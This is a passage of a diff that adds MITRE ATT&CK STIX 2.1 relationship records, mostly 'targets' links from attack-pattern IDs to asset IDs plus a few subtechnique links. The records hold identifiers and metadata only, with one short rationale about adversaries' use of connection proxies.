+ "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5841a79-7f94-445f-9c7a-212a4d1c3ce9", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e58dfd29-8252-4851-856f-249beb4f6ca9", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5a9ee41-9bac-439a-8c87-ec66d2e1eccb", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5c2080c-7780-408a-a73e-93476b692ffb", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5c4068c-58b5-4242-b89f-21671999cb68", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5c93053-3367-4213-81f6-f60c36aae33b", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5c9aacb-51e3-41d3-995d-9e6ed04a2454", + "created": "2023-10-02T20:17:51.320Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:17:51.320Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5d15d63-433a-424b-9b96-cf55288323bf", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5d8bee9-3932-4c77-92f8-9f1f96ca36fd", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5df8634-233f-4fd0-8c19-248e017c92cc", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5e04084-4d47-43a4-bf3d-2b01522e85a2", + "created": "2024-06-26T19:28:41.041Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:28:41.041Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5e2c91a-f576-49df-8b47-5f0da154dee7", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5f0c271-db16-4be1-ac7e-837c2a0aac9a", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6038f6a-8536-43f7-ae21-1506f06f70e7", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e60af83b-fd51-4cf7-81b0-f915bcf8b108", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e60ecf8c-ae86-4ae1-8eea-59bdb3bd3591", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e619019e-362e-4027-983a-534123afed1d", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e61bfeb2-3e80-4a26-abe2-034c383dce56", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6219ed8-180d-4bde-afac-74219ff11e0d", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e629c3ae-66d6-4b8e-a2fe-4b2731466b4a", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e62ef502-8e42-4652-9bde-d12b9a4728b9", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e638a49a-b30f-4493-af1b-d40c4eaeca61", + "created": "2024-06-26T13:49:41.822Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:49:41.822Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e65cc4f4-186b-4e1c-83b6-027639e7f378", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6604543-0d25-41da-a679-0def4ba6413a", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e665f18e-c2f2-4745-a1b8-5e2bd36cd9b0", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e67182ae-4edb-4f92-a906-c4c3edd2264d", + "created": "2024-05-23T04:08:13.721Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:35:03.803Z", + "description": "Asset Mapping Rationale: Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.", + "relationship_type": "targets", + "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6867d44-3d34-4604-b5e8-35e325051f1e", + "created": "2020-02-21T21:07:55.499Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", + "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6898e4e-5cea-486b-ae2f-da894160b1f0", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e69a178c-53c8-4909-bab6-549510c52d27", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6af4cbd-1b2e-4733-be57-43a845f465eb", + "created": "2023-09-28T20:30:32.778Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:30:32.778Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6bda2de-ac4e-4e00-9348-a044a3477015", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6c0937d-c958-4503-97ed-6b9541b47df6", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6dd1991-c4f0-4a09-bbb1-7f523986534d", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6e8a4db-0c7d-451c-8e90-f9e650892fc6", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6ef2dea-1787-479d-8355-67217c59b03d", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e6fa0699-430b-4506-9a6d-286b22381206", + "created": "2020-01-28T14:05:17.985Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "target_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e711d2e1-09b7-4d8b-bf18-0220463db3af", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e72c92ed-229d-4c31-aa4d-cf19e23d4931", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e7339f46-a3f5-47c8-9850-313797cd6fb2", + "created": "2020-10-02T16:56:49.838Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + 